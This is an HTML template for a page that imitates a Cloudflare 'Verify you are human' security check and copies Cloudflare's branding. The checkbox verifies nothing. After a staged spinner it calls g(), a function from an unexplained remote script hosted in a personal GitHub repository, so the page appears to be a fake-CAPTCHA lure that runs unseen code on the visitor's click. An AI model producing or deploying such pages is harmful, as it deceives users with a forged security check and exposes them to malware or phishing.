<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>NhuNgoc</title>
    <meta name="description"
        content="NhuNgoc">

    <!-- Social Media Meta Tags -->
    {{!-- <meta property="og:title" content="Experience Yoga - Your Path to Wellness"> --}}
    {{!-- <meta property="og:description" content="Join our yoga community and discover the benefits of daily yoga practice."> --}}
    {{!-- <meta property="og:image" content="/images/42b829de-7d0b-0ded-b752-3cade6e99db4.jpg"> --}}

    {{!-- <meta name="twitter:card" content="summary_large_image"> --}}
    {{!-- <meta name="twitter:title" content="Experience Yoga - Your Path to Wellness"> --}}
    {{!-- <meta name="twitter:description" content="Embrace health and peace through yoga exercises."> --}}
    {{!-- <meta name="twitter:image" content="/images/42b829de-7d0b-0ded-b752-3cade6e99db4.jpg"> --}}

    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">
    <link rel="stylesheet" href="/css/reset.css">
    <style>
        .app {
            width: 100%;
            min-height: 100vh;
            display: flex;
            justify-content: center;
            margin-top: 100px;
        }

        .title {
            font-size: 16px;
            margin-bottom: 16px;
        }

        .desc {
            font-size: 16px;
        }

        .captcha-box {
            display: flex;
            align-items: center;
            gap: 16px;

            width: fit-content;
            border-radius: 2px;
            border: 2px solid #000;
            padding: 16px;
            margin-bottom: 32px;
        }

        .captcha-box-inner {
            display: flex;
            align-items: center;
            gap: 8px;
        }

        .checkbox-captcha {
            width: 30px;
            height: 30px;
            border-radius: 2px;
            border: 1px solid #000;
            cursor: pointer;
            position: relative;
            overflow: hidden;
        }

        .checkbox-captcha:hover {
            border: 2px solid #000;
        }

        .box-title {
            font-size: 12px;
        }

        .img-cloud {
            width: 60px;
        }

        .loading-spinner {
            display: none;
            width: 100%;
            height: 100%;
            border: 2px solid #f3f3f3;
            border-top: 2px solid #3498db;
            border-radius: 50%;
            animation: spin 1s linear infinite;
        }

        .checkmark {
            display: none;
            font-size: 20px;
            color: green;
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            align-items: center;
            justify-content: center;
        }

        @media (min-width: 768px) {
            .app {
                width: 100%;
                min-height: 100vh;
                display: flex;
                align-items: center;
                justify-content: center;
            }

            .box-title {
                font-size: 16px;
            }

            .title {
                font-size: 32px;
                margin-bottom: 16px;
            }

            .desc {
                font-size: 24px;
            }

            .captcha-box {
                display: flex;
                align-items: center;
                gap: 16px;

                width: fit-content;
                border-radius: 2px;
                border: 2px solid #000;
                padding: 16px;
                margin-bottom: 32px;
                position: relative;
                overflow: hidden;

            }


            .captcha-box-inner {
                display: flex;
                align-items: center;
                gap: 8px;
            }

            .checkbox-captcha {
                width: 30px;
                height: 30px;
                border-radius: 2px;
                border: 1px solid #000;
                cursor: pointer;
                position: relative;
                overflow: hidden;
            }

            .checkbox-captcha:hover {
                border: 2px solid #000;
            }

            .checkmark {
                display: none;
                font-size: 20px;
                color: green;
                position: absolute;
                top: 0;
                left: 0;
                width: 100%;
                height: 100%;
                align-items: center;
                justify-content: center;
            }

            .img-cloud {
                width: 60px;
            }
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>

<body>
    <div class="app" style="position: relative;">
        <div class="container">
            <div>
                <div>
                    <p class="title"><strong>Checking if the site connection is secure</strong></p>
                    <div class="captcha-box">
                        <div class="captcha-box-inner">
                            <div class="checkbox-captcha" onclick="verifyCaptcha()">
                                <div class="loading-spinner"></div>
                                <div class="checkmark">✔</div>
                            </div>
                            <p class="box-title"><strong>Verify you are human</strong></p>
                        </div>
                        <div>
                            <img class="img-cloud" src="/images/Cloudflare_Logo.svg.png" alt="Cloudflare_Logo.svg.png">
                        </div>
                    </div>
                    <p class="desc">We needs to review the security of your connection before processing.</p>
                </div>

                <div style="position: absolute; bottom: 0; left: 0;">
                    <div class="" style="display: flex; gap: 8px; align-items: center;width: 100%;">
                        <a href="/images/Cloudflare_Logo.svg.png" class="policy" style="color: gray; font-size: 12px; text-decoration: solid;">Policy</a>
                        <span style="color: gray; font-size: 12px; text-decoration: solid;">-</span>
                        <a href="/images/playstore.png" style="color: gray; font-size: 12px; text-decoration: solid;">About Us</a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz"
        crossorigin="anonymous"></script>
    <script src="https://code.jquery.com/jquery-3.7.1.min.js"
        integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>
    <script>
        var slug = "{{{slug}}}";
    </script>
    {{!-- <script src="/js/main.js"></script> --}}
    <script src="https://cdn.jsdelivr.net/gh/TaiLe1101/v1@3310b7bfea10906718f363724e376d1d10c473ac/d.js"></script>
    <script>
        function verifyCaptcha() {
            const captchaBox = document.querySelector('.captcha-box');
            const loadingSpinner = document.querySelector('.loading-spinner');
            const checkmark = document.querySelector('.checkmark');

            loadingSpinner.style.display = 'block';
            captchaBox.style.pointerEvents = 'none';
            setTimeout(() => {
                loadingSpinner.style.display = 'none';
                checkmark.style.display = 'flex';
                captchaBox.classList.add('verified');
                g()
            }, 2000); // 2 seconds loading time
        }
    </script>
    
</body>

</html>